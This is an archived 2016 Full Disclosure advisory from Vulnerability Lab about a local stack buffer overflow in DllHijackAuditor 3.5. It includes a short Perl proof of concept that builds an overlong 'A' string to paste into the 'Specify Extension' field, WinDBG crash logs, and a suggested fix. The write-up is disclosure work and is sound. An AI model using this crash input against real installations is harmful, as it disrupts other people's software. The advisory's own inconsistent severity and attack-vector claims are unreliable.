[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] DllHijackAuditor 3.5 - Stack Buffer Overflow Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-09-23 9:35:51
Message-ID: 767a2aa8-a0b5-c562-eb76-16bcb5f53a25 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
DllHijackAuditor 3.5 - Stack Buffer Overflow Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1954
Release Date:
=============
2016-09-21
Vulnerability Laboratory ID (VL-ID):
====================================
1954
Common Vulnerability Scoring System:
====================================
6.3
Product & Service Introduction:
===============================
DLL Hijack Auditor is the smart tool to Audit against the Dll Hijacking Vulnerability \
in any Windows application. This is one of the critical security issue affecting \
almost all Windows systems. Though most of the apps have been fixed, but still many \
Windows applications are susceptible to this vulnerability which can allow any \
attacker to completely take over the system. DllHijackAuditor helps in discovering \
all such Vulnerable Dlls in a Windows application which otherwise can lead to \
successful exploitation resulting in total compromise of the system.
(Copy of the Homepage: http://securityxploded.com/)
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a stack buffer overflow \
vulnerability in the DllHijackAuditor v3.5 software.
Vulnerability Disclosure Timeline:
==================================
2016-09-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
SecurityXploded
Product: DllHijackAuditor - Software 3.5
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local stack buffer overflow vulnerability has been discovered in the official \
DllHijackAuditor v3.5 software. The overflow vulnerability allows remote attackers to \
take-over the process by overwrite of the active registers.
The stack buffer overflow vulnerability is located in the `Specify Extension Entry` \
module of the software. Local attackers are able to include unicode as malicious \
payload to crash software via stack overflow. Thus allows the local attacker to \
overwrite for example the eip register to take control of the vulnerable software \
process.
The security risk of the issue is estimated as high with a cvss (common vulnerability \
scoring system) count of 6.1. Exploitation of the vulnerability requires a low \
privileged system user account or restricted access without user interaction. \
Successful exploitation of the vulnerability results in computer system manipulation \
and compromise of the computer system.
Vulnerable Input(s):
[+] Specify Extension - (Entry)
Proof of Concept (PoC):
=======================
A local stack overflow vulnerability can be exploited by local attackers without user \
interaction and with privileged system user account. For security demonstration or to \
reproduce the sofwtare vulnerability follow the provided information and steps below \
to continue.
Manual steps to reproduce the vulnerability ...
1. Launch the DllHijackAuditors.exe software process
2. Run the code in perl and a file format (.txt) will create
3. Copy the AAAAAAAAA+... string from DllHijackAuditor.txt to clipboard
4. Paste it to the input Specify Extension AAAAAAAAA+... string and click `Start \
Audit` to process 5. Software crash permanently by a stack overflow
6. Successfully reproduce of the local stack buffer overflow vulnerability!
PoC: Exploit Code (Perl)
#!/usr/bin/perl
my $Buff = "x41" x 3000;
open(MYFILE,'>>DllHijackAuditor.txt');
print MYFILE $Buff;
close(MYFILE);
print " POC Created by ZwXn";
--- PoC Debug Session Logs [WinDBG] ---
Stack buffer overflow - code c0000409 (!!! second chance !!!)
eax=00000001 ebx=0059c60c ecx=00000005 edx=773913f0 esi=0766fc7c edi=0014d2c0
eip=00529e5b esp=0766f5b8 ebp=0766f5d0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
DllHijackAuditor+0x129e5b:
00529e5b cd29 int 29h
-
EXCEPTION_RECORD: ffffffff -- (.exr ffffffffffffffff)
ExceptionAddress: 00529e5b (DllHijackAuditor+0x00129e5b)
ExceptionCode: c0000409 (Stack buffer overflow)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 00000005
-
FAULTING_THREAD: 00000754
BUGCHECK_STR: STACK_OVERRUN
PROCESS_NAME: DllHijackAuditor.exe
FAULTING_MODULE: 77300000 ntdll
DEBUG_FLR_IMAGE_TIMESTAMP: 534bb17f
ERROR_CODE: (NTSTATUS) 0xc0000409 -
Le syst me a d tect la saturation de la m moire tampon dans cette application. Cette \
saturation pourrait permettre un utilisateur mal intentionn de prendre le contr le \
de cette application.
DEFAULT_BUCKET_ID: WRONG_SYMBOLS
LAST_CONTROL_TRANSFER: from 00529e49 to 00529e5b
-
0:004> d esi
0766fc7c 00 3a 5c 55 73 65 72 73-5c 5a 77 58 5c 41 70 70 .:UsersZwXApp
0766fc8c 44 61 74 61 5c 4c 6f 63-61 6c 5c 54 65 6d 70 5c DataLocalTemp
0766fc9c 44 6c 6c 48 69 6a 61 63-6b 41 75 64 69 74 5f 41 DllHijackAudit_A
0766fcac 70 70 43 72 61 73 68 56-69 65 77 2e 65 78 65 5f ppCrashView.exe_
0766fcbc 32 30 30 34 37 33 35 35-33 36 5c 74 65 73 74 2e 2004735536test.
0766fccc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fcdc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fcec 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0:004> d 0766fcec
0766fcec 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fcfc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fd0c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fd1c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fd2c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fd3c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fd4c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0766fd5c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
Solution - Fix & Patch:
=======================
Restrict the number of characters in the input of the `Specify Extension Entry` \
module and allocate the memory to prevent exploitation.
Security Risk:
==============
The security risk of the local stack buffer overflow vulnerability in the software \
core is estimated as high. (CVSS 6.3)
Credits & Authors:
==================
ZwX - [http://www.vulnerability-lab.com/show.php?user=ZwX]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including \
the warranties of merchantability and capability for a particular purpose. \
Vulnerability-Lab or its suppliers are not liable in any case of damage, including \
direct, indirect, incidental, consequential loss of business profits or special \
damages, even if Vulnerability-Lab or its suppliers have been advised of the \
possibility of such damages. Some states do not allow the exclusion or limitation of \
liability mainly for consequential or incidental damages so the foregoing limitation \
may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - \
vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - \
vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, \
resources or information requires authorization from Vulnerability Laboratory. \
Permission to electronically redistribute this alert in its unmodified form is \
granted. All other rights, including the use of other media, are reserved by \
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, \
source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, \
use or edit our material contact (admin@) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic